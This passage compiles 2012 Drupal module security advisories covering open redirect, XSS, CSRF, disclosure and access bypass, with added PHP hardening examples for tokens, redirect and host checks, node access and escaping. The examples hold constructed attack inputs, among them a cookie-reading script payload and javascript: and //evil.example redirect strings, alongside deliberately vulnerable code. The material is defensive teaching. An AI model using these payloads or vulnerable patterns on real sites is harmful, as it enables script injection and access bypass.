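function token_is_valid(string $sessionId, string $action, string $token, string $secret): bool
{
    return hash_equals(action_token($sessionId, $action, $secret), $token);
}

/**
 * What the admin listing should emit: the destructive link carries the token.
 * The path is constructed; the advisory does not describe the module's routes.
 */
function delete_link(int $id, string $sessionId, string $secret): string
{
    $token = action_token($sessionId, "delete:$id", $secret);
    return '/admin/simplemeta/delete/' . $id . '?token=' . rawurlencode($token);
}

/**
 * Request handler: validate before touching state. Returning 'denied' stands
 * in for a 403 response; nothing is deleted on that path.
 */
function handle_delete(array $query, string $sessionId, string $secret): string
{
    $id    = (int) ($query['id'] ?? 0);
    $token = (string) ($query['token'] ?? '');
    if ($id <= 0 || !token_is_valid($sessionId, "delete:$id", $token, $secret)) {
        return 'denied';
    }
    // ... perform the deletion here ...
    return "deleted $id";
}

// Legitimate flow: the admin follows the link the listing generated.
parse_str((string) parse_url(delete_link(42, $sessionId, SITE_SECRET), PHP_URL_QUERY), $query);
$query['id'] = 42;
echo handle_delete($query, $sessionId, SITE_SECRET), PHP_EOL;

// Forged flows: a request with no token, a token minted in another session,
// and a token for entry 42 replayed against entry 43 are all refused.
echo handle_delete(['id' => 42], $sessionId, SITE_SECRET), PHP_EOL;
echo handle_delete(['id' => 42, 'token' => action_token('other-session', 'delete:42', SITE_SECRET)], $sessionId, SITE_SECRET), PHP_EOL;
echo handle_delete(['id' => 43, 'token' => action_token($sessionId, 'delete:42', SITE_SECRET)], $sessionId, SITE_SECRET), PHP_EOL;
```

Binding the token to the object id as well as the session is what stops a token harvested from one legitimate link being replayed against a different entry; binding it to the session is what stops a token from the attacker's own account working against the admin's.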
[Full-disclosure] [Security-news] SA-CONTRIB-2012-098 - Janrain Capture - Open Redirect
View online: http://drupal.org/node/1632734

* Advisory ID: DRUPAL-SA-CONTRIB-2012-098
* Project: Janrain Capture [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-June-13
* Security risk: Less critical [2]
* Exploitable from: Remote
* Vulnerability: Open Redirect

DESCRIPTION

This module allows for authentication through the cloud user-management platform Janrain Capture.

Part of the module exposes an endpoint to re-synchronize user data between Drupal and Capture and allows for passing an optional parameter to redirect the user back to an original location. This parameter was not checked to verify that it's an internal path, possibly leading to an open redirect vulnerability if the user was tricked into accessing the authentication workflow via a specially crafted URL.

An additional security weakness occurs when the module creates a new local user account. The input to the generated password should be unguessable, but could be partially discovered. For sites that allow both local and Capture logins, this could lead to easy brute-force guessing of the local password.

CVE: Requested

VERSIONS AFFECTED

* Janrain Capture 6.x-1.0
* Janrain Capture 7.x-1.0

Drupal core is not affected. If you do not use the contributed Janrain Capture [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Janrain Capture module for Drupal 6.x, upgrade to Janrain Capture 6.x-1.1 [4] or later
* If you use the Janrain Capture module for Drupal 7.x, upgrade to Janrain Capture 7.x-1.1 [5] or later

If you are using this module and allow local logins, you may wish to regenerate the "random" local user passwords.

Also see the Janrain Capture [6] project page.

REPORTED BY

* Peter Wolanin [7] of the Drupal Security Team

FIXED BY

* Bryce Hamrick [8] the module maintainer

COORDINATED BY

* Peter Wolanin [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/janrain_capture
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/janrain_capture
[4] http://drupal.org/node/1632704
[5] http://drupal.org/node/1632702
[6] http://drupal.org/project/janrain_capture
[7] http://drupal.org/user/49851
[8] http://drupal.org/user/1350078
[9] http://drupal.org/user/49851
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-097 - Protest - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1619856

* Advisory ID: DRUPAL-SA-CONTRIB-2012-097
* Project: Protest [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-June-06
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

Protest allows websites to display a complete page blackout (website protest).

The module contains a cross site scripting (XSS) vulnerability as it fails to sanitize user input before display.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer protest".

CVE: Requested

VERSIONS AFFECTED

* Protest 6.x-1.x versions prior to 6.x-1.2.
* Protest 7.x-1.x versions prior to 7.x-1.2.

Drupal core is not affected. If you do not use the contributed Protest [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Protest module for Drupal 6.x, upgrade to Protest 6.x-1.2 [4]
* If you use the Protest module for Drupal 7.x, upgrade to Protest 7.x-1.2 [5]

Also see the Protest [6] project page.

REPORTED BY

* Shawn Price [7]

FIXED BY

* Shawn Price [8] the module maintainer

COORDINATED BY

* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/protest
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/protest
[4] http://drupal.org/node/1618090
[5] http://drupal.org/node/1618092
[6] http://drupal.org/project/protest
[7] http://drupal.org/user/25556
[8] http://drupal.org/user/25556
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-096 - Authoring HTML - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1619852

* Advisory ID: DRUPAL-SA-CONTRIB-2012-096
* Project: Authoring HTML [1] (third-party module)
* Version: 6.x
* Date: 2012-June-06
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting

DESCRIPTION

This module creates an input format suitable for use within a WYSIWYG editor. It adds support for the iframe HTML tag, making it friendly with the popular iframe embeds available on popular video sites like YouTube and Vimeo. It supports the script tag too. Both tags will only be allowed if the referred URL is whitelisted. By default, you can refer to some well-known video sites in the iframe tag and any site in the script tag.

The module doesn't sufficiently verify the whitelisted hosts. This allows an attacker to register and use a malicious host, bypassing verification.

This vulnerability is mitigated by the fact that an attacker must have a role authorized to use the "Authoring HTML" input format.

CVE: Requested

VERSIONS AFFECTED

* Authoring HTML 6.x-1.x versions prior to 6.x-1.1.

Drupal core is not affected. If you do not use the contributed Authoring HTML [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Authoring HTML module for Drupal 6.x, upgrade to Authoring HTML 6.x-1.1 [4]

Also see the Authoring HTML [5] project page.

REPORTED BY

* Eriksen Costa [6] the module maintainer

FIXED BY

* Eriksen Costa [7] the module maintainer
* Matt Chapman [8] of the Drupal Security Team

COORDINATED BY

* Matt Chapman [9] of the Drupal Security Team
* Greg Knaddison [10] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14].

[1] http://drupal.org/project/authoring_html
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/authoring_html
[4] http://drupal.org/node/1619086
[5] http://drupal.org/project/authoring_html
[6] http://drupal.org/user/215266
[7] http://drupal.org/user/215266
[8] http://drupal.org/user/143172
[9] http://drupal.org/user/143172
[10] http://drupal.org/user/36762
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
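The Global Redirect and Janrain Capture advisories above describe the same open-redirect defect (a destination parameter never checked to be an internal path), and the Authoring HTML advisory a host whitelist that an attacker-registered host can slip past. Both come down to parsing a user-supplied URL strictly before trusting it. The following is an added example, not code from any of these modules or from Drupal core, written as standalone PHP: destination_is_local() accepts only Drupal-style internal paths such as node/1, and embed_host_allowed() matches an embed URL's host against an allow-list exactly or as a dot-bounded subdomain. The advisory does not say how the Authoring HTML check was bypassed, so the loose matches the comments warn about are general pitfalls of host allow-lists, not the module's actual bug. Drupal 7 core has url_is_external() for the first check; the version here is deliberately stricter. All sample inputs are constructed.

```php
<?php
// Added example: not code from Global Redirect, Janrain Capture, Authoring
// HTML or Drupal core. Two checks to run before a user-supplied URL is trusted.

/**
 * TRUE only for a Drupal-style internal path ("node/1", "user/login?x=1").
 * Rejects anything a browser could resolve to another origin, including forms
 * that only become external after the site prepends "/" when building the
 * Location header ("/evil.example" becomes "//evil.example").
 */
function destination_is_local(string $dest): bool
{
    // Control characters, whitespace and backslashes have no place in a path;
    // browsers treat "/\" like "//", and CR/LF would split the header.
    if ($dest === '' || preg_match('/[\x00-\x20\x7f\\\\]/', $dest)) {
        return false;
    }
    // Internal paths never start with "/"; this also covers "//host".
    if ($dest[0] === '/') {
        return false;
    }
    // A colon before the first "/", "?" or "#" is a scheme or a host:port
    // ("http://...", "javascript:...", "evil.example:80/x").
    $colon = strpos($dest, ':');
    if ($colon !== false && !preg_match('![/?#]!', substr($dest, 0, $colon))) {
        return false;
    }
    return true;
}

/**
 * TRUE if $url is an http(s) URL whose host is in $allowed or a subdomain of
 * an entry. Exact or dot-bounded matching is the point: a substring test
 * (strpos) would accept "youtube.com.evil.example" and "evil.example/?u=youtube.com".
 */
function embed_host_allowed(string $url, array $allowed): bool
{
    $p = parse_url($url);
    if ($p === false || empty($p['host']) || empty($p['scheme'])) {
        return false;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // "http://www.youtube.com@evil.example/" parses with host evil.example;
    // userinfo is never legitimate in an embed src, so refuse it outright.
    if (isset($p['user']) || isset($p['pass'])) {
        return false;
    }
    $host = strtolower(rtrim($p['host'], '.'));
    foreach ($allowed as $entry) {
        $entry = strtolower($entry);
        if ($host === $entry) {
            return true;
        }
        $suffix = '.' . $entry;
        if (strlen($host) > strlen($suffix) && substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Constructed inputs: the first two of each group pass, the rest are refused.
$destinations = ['node/1', 'user/login?destination=node/1',
    'http://evil.example/', '//evil.example/', '/evil.example',
    'javascript:alert(1)', 'evil.example:80/x'];
foreach ($destinations as $d) {
    printf("%-40s %s\n", $d, destination_is_local($d) ? 'local' : 'refused');
}

$hosts = ['youtube.com', 'vimeo.com'];
$urls = ['https://www.youtube.com/embed/x', 'http://vimeo.com/1',
    'https://youtube.com.evil.example/x', 'https://evil.example/?u=youtube.com',
    'https://www.youtube.com@evil.example/', 'ftp://youtube.com/'];
foreach ($urls as $u) {
    printf("%-40s %s\n", $u, embed_host_allowed($u, $hosts) ? 'allowed' : 'refused');
}
```

The rule of thumb both functions apply is to decide on the parsed components (scheme, userinfo, host) rather than on the raw string, and to reject on any doubt; a redirect target that fails the check should fall back to the site front page, and an embed whose host fails should be dropped from the filtered output rather than passed through.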
[Full-disclosure] [Security-news] SA-CONTRIB-2012-095 - Simplenews - Information Disclosure
View online: http://drupal.org/node/1619848

* Advisory ID: DRUPAL-SA-CONTRIB-2012-095
* Project: Simplenews [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2012-June-06
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Information Disclosure

DESCRIPTION

Simplenews publishes and sends newsletters.

When subscribing to a Simplenews mailing list, confirmation may be required, and Simplenews may disclose the user's e-mail address on the confirmation page. Further, due to the absence of a noindex tag, the list of e-mail addresses can subsequently be indexed by search engines.

CVE: Requested

VERSIONS AFFECTED

* Simplenews 6.x-1.x versions prior to 6.x-1.4
* Simplenews 6.x-2.x versions prior to 6.x-2.0-alpha4
* Simplenews 7.x-1.x versions prior to 7.x-1.0-rc1

Drupal core is not affected. If you do not use the contributed Simplenews [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Simplenews module for Drupal 6.x, upgrade to Simplenews 6.x-1.4 [4] or Simplenews 6.x-2.0-alpha4 [5]
* If you use the Simplenews module for Drupal 7.x, upgrade to Simplenews 7.x-1.0-rc1 [6]

Also see the Simplenews [7] project page.

REPORTED BY

* Laza [8]
* Sascha Grossenbacher [9] the module maintainer

FIXED BY

* Sascha Grossenbacher [10] the module maintainer
* Dave Reid [11] of the Drupal Security Team

COORDINATED BY

* Dave Reid [12] of the Drupal Security Team
* Greg Knaddison [13] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14].

Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17].

[1] http://drupal.org/project/simplenews
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/simplenews
[4] http://drupal.org/node/1619812
[5] http://drupal.org/node/1619818
[6] http://drupal.org/node/1619820
[7] http://drupal.org/project/simplenews
[8] http://drupal.org/user/145993
[9] http://drupal.org/user/214652
[10] http://drupal.org/user/214652
[11] http://drupal.org/user/53892
[12] http://drupal.org/user/53892
[13] http://drupal.org/user/36762
[14] http://drupal.org/contact
[15] http://drupal.org/security-team
[16] http://drupal.org/writing-secure-code
[17] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-094 - Maestro module - Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS)
View online: http://drupal.org/node/1619830

* Advisory ID: DRUPAL-SA-CONTRIB-2012-094
* Project: Maestro [1] (third-party module)
* Version: 7.x
* Date: 2012-June-06
* Security risk: Critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting, Cross Site Request Forgery

DESCRIPTION

The Maestro module is a workflow engine/solution that facilitates simple and complex business process automation.

The module doesn't sufficiently filter user-supplied data in its admin screens, leading to a Cross Site Scripting (XSS) vulnerability.

A Cross Site Request Forgery vulnerability in the control of the module could allow a user to change workflows, including injecting malicious scripts to exploit the XSS.

This vulnerability is mitigated by the fact that an attacker must have a role with the maestro admin permissions or use CSRF against a user with that permission.

CVE: Requested

VERSIONS AFFECTED

* maestro 7.x-1.x versions prior to 7.x-1.2.

Drupal core is not affected. If you do not use the contributed Maestro [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the maestro module for Drupal 7.x, upgrade to Maestro 7.x-1.2 [4]

Also see the Maestro [5] project page.

REPORTED BY

* Steve Persch [6]

FIXED BY

* Blaine Lang [7] module maintainer
* Randy Kolenko [8] module maintainer
* Greg Knaddison [9] of the Drupal Security Team

COORDINATED BY

* Greg Knaddison [10] of the Drupal Security Team
* Stella Power [11] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15].

[1] http://drupal.org/project/maestro
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/maestro
[4] http://drupal.org/node/1617952
[5] http://drupal.org/project/maestro
[6] http://drupal.org/user/179805
[7] http://drupal.org/user/726382
[8] http://drupal.org/user/704970
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/36762
[11] http://drupal.org/user/66894
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration
[Full-disclosure] [Security-news] SA-CONTRIB-2012-093 - Node Embed - Access Bypass
View online: http://drupal.org/node/1619824 * Advisory ID: DRUPAL-SA-CONTRIB-2012-093 * Project: Node Embed [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-June-06 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - Node Embed gives content editors an interface for selecting and embedding nodes using a WYSIWYG editor. The interface for selecting nodes is a page that had no access check, allowing users to view node titles they might not have access to. This issue only affects your site if you have unpublished nodes or use a node access module to restrict content access from some users. CVE: Requested VERSIONS AFFECTED --- * Node Embed 6.x-1.x versions prior to 6.x-1.5. * Node Embed 7.x-1.x versions prior to 7.x-1.0. Drupal core is not affected. If you do not use the contributed Node Embed [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Node Embed module for Drupal 6.x, upgrade to Node Embed 6.x-1.5 [4] * If you use the Node Embed module for Drupal 7.x, upgrade to Node Embed 7.x-1.0 [5] Also see the Node Embed [6] project page. REPORTED BY - * Paul Aumer-Ryan [7] FIXED BY * Scott Reynen [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. 
[1] http://drupal.org/project/node_embed
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/node_embed
[4] http://drupal.org/node/1618430
[5] http://drupal.org/node/1618428
[6] http://drupal.org/project/node_embed
[7] http://drupal.org/user/422353
[8] http://drupal.org/user/109890
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
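The class of bug in the Node Embed advisory (a node-picker page with no access check) is illustrated below with an added example that is not the module's own code. It shows a Drupal 7 menu callback registered without an access check and then hardened in two places: the router item requires the "access content" permission, and the listing query itself honours node access grants and the published flag, since a permission on the path alone would still leak titles of restricted or unpublished nodes. The module name example_embed, the paths, the q_title query parameter and the JSON response shape are hypothetical; the code assumes a Drupal 7 site and runs inside Drupal, not stand-alone.

```php
<?php
// Added example (not Node Embed's own code). Names prefixed "example_embed_",
// the paths and the "q_title" parameter are hypothetical.

/**
 * Implements hook_menu().
 */
function example_embed_menu() {
  $items = array();

  // VULNERABLE: 'access callback' => TRUE lets any visitor reach the picker,
  // so it discloses titles of unpublished or node-access-restricted content.
  $items['example-embed/select-unsafe'] = array(
    'page callback' => 'example_embed_select_page',
    'access callback' => TRUE,
    'type' => MENU_CALLBACK,
  );

  // HARDENED: the router runs user_access('access content') before the page
  // callback, and the callback below filters the listing per user as well.
  $items['example-embed/select'] = array(
    'page callback' => 'example_embed_select_page',
    'access arguments' => array('access content'),
    'type' => MENU_CALLBACK,
  );
  return $items;
}

/**
 * Returns nodes whose title matches ?q_title= as JSON, respecting node access.
 *
 * The permission on the router item is necessary but not sufficient: the
 * query must also carry the 'node_access' tag so node access modules can
 * filter it, and unpublished nodes must be excluded explicitly because the
 * grants system does not cover the published flag.
 */
function example_embed_select_page() {
  global $user;
  $search = isset($_GET['q_title']) ? $_GET['q_title'] : '';

  $query = db_select('node', 'n')
    ->fields('n', array('nid', 'title'))
    ->condition('n.title', '%' . db_like($search) . '%', 'LIKE')
    ->range(0, 20)
    // Lets node access modules (og, content_access, ...) rewrite the query.
    ->addTag('node_access');

  // Hide unpublished nodes unless the user may bypass node access entirely.
  if (!user_access('bypass node access')) {
    $query->condition('n.status', 1);
  }

  $matches = array();
  foreach ($query->execute() as $row) {
    // Re-check per node so hook_node_access() implementations are honoured
    // too; node_access('view') also rejects unpublished nodes for ordinary users.
    $node = node_load($row->nid);
    if ($node && node_access('view', $node, $user)) {
      // Titles are user-supplied text: escape before they reach the browser.
      $matches[$row->nid] = check_plain($row->title);
    }
  }
  drupal_json_output($matches);
}
```

Both layers matter: dropping the 'node_access' tag and the status condition while keeping the permission would pass a casual test (anonymous users are refused) and still expose titles to any authenticated user, which is exactly the population the advisory's mitigation note is about.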
[Full-disclosure] [Security-news] SA-CONTRIB-2012-092 - Organic Groups - Cross Site Scripting (XSS) and Access Bypass
View online: http://drupal.org/node/1619810

* Advisory ID: DRUPAL-SA-CONTRIB-2012-092
* Project: Organic groups [1] (third-party module)
* Version: 6.x
* Date: 2012-June-06
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Cross Site Scripting, Access bypass

DESCRIPTION

The Organic Groups module enables users to create and manage their own 'groups'. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves.

Cross Site Scripting

The module doesn't sufficiently filter user-supplied text when it is used in connection with the Vertical Tabs module.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create or edit a group title, the site must have the contributed Vertical Tabs module installed, and the Vertical Tabs configuration must include the Organic Groups select area (this is the default configuration when Vertical Tabs is enabled).

Access bypass

The module's default views do not sufficiently check the Drupal core "access content" permission.

This vulnerability is mitigated by the fact that a site must have removed the "access content" permission from all users. This is not a common configuration.

CVE: Requested

VERSIONS AFFECTED

* Organic groups 6.x-2.x versions prior to 6.x-2.4.

Drupal core is not affected. If you do not use the contributed Organic groups [3] module, there is nothing you need to do.

SOLUTION

Install the latest version:

* If you use the Organic groups module for Drupal 6.x, upgrade to Organic Groups 6.x-2.4 [4]

Also see the Organic groups [5] project page.
REPORTED BY

* Ezra Barnett Gildesgame [6] identified the Cross Site Scripting issue
* Fox [7] identified the Access Bypass issue

FIXED BY

* Adam Ross [8] the module maintainer
* Fox [9]
* Greg Knaddison [10] of the Drupal Security Team

COORDINATED BY

* Greg Knaddison [11] of the Drupal Security Team
* Forest Monsen [12] of the Drupal Security Team

CONTACT AND MORE INFORMATION

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16].

[1] http://drupal.org/project/og
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/og
[4] http://drupal.org/node/1619736
[5] http://drupal.org/project/og
[6] http://drupal.org/user/69959
[7] http://drupal.org/user/426416
[8] http://drupal.org/user/346868
[9] http://drupal.org/user/426416
[10] http://drupal.org/user/36762
[11] http://drupal.org/user/36762
[12] http://drupal.org/user/181798
[13] http://drupal.org/contact
[14] http://drupal.org/security-team
[15] http://drupal.org/writing-secure-code
[16] http://drupal.org/security/secure-configuration
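The Cross Site Scripting half of the Organic Groups advisory comes down to a group title (text any group editor controls) reaching HTML unescaped. The following is an added example, not Organic Groups' or Vertical Tabs' code, showing the unsafe and the hardened way to emit such a title; the function names example_og_summary_unsafe/example_og_summary_safe and the payload are constructed for illustration. It assumes Drupal's check_plain(), which is htmlspecialchars() with ENT_QUOTES and UTF-8; the fallback definition lets the file run with plain php outside a Drupal site.

```php
<?php
// Added example (not Organic Groups' or Vertical Tabs' code). The
// example_og_* names and the payload below are constructed for illustration.

// Drupal 6/7 check_plain() is exactly this call; defining it when absent lets
// the file run stand-alone: php og_title_example.php
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

/**
 * VULNERABLE: a user-supplied group title is concatenated into markup (here,
 * the kind of summary text a vertical tab would display) without escaping.
 * Whoever can edit the title can inject script into every editor's browser.
 */
function example_og_summary_unsafe($group_title) {
  return '<span class="summary">' . $group_title . '</span>';
}

/**
 * HARDENED: escape at the point of output. In Drupal that is check_plain(), or
 * the @placeholder form of t(); storing a title does not make it safe to print.
 */
function example_og_summary_safe($group_title) {
  return '<span class="summary">' . check_plain($group_title) . '</span>';
}

// Constructed payload of the kind an attacker with "edit group" rights could
// save as a group title.
$payload = '<script>alert(document.cookie)</script>';

echo "unsafe: ", example_og_summary_unsafe($payload), "\n";
echo "safe:   ", example_og_summary_safe($payload), "\n";

// The same rule applies when the title is passed to JavaScript: escape it for
// HTML first (as above) or hand it over through drupal_add_js() settings, never
// by splicing the raw string into an inline script.
```

For the access-bypass half, the analogous fix lives in the module's default view definitions rather than in output escaping: a Views 2 display exported with an access option of type 'none' is reachable by anyone who can reach the path, whereas overriding that option to type 'perm' with perm 'access content' makes the view honour the core permission the advisory names. Which views and displays Organic Groups changed in 6.x-2.4 is not stated on this page, so check the release's diff for your site's configuration rather than assuming.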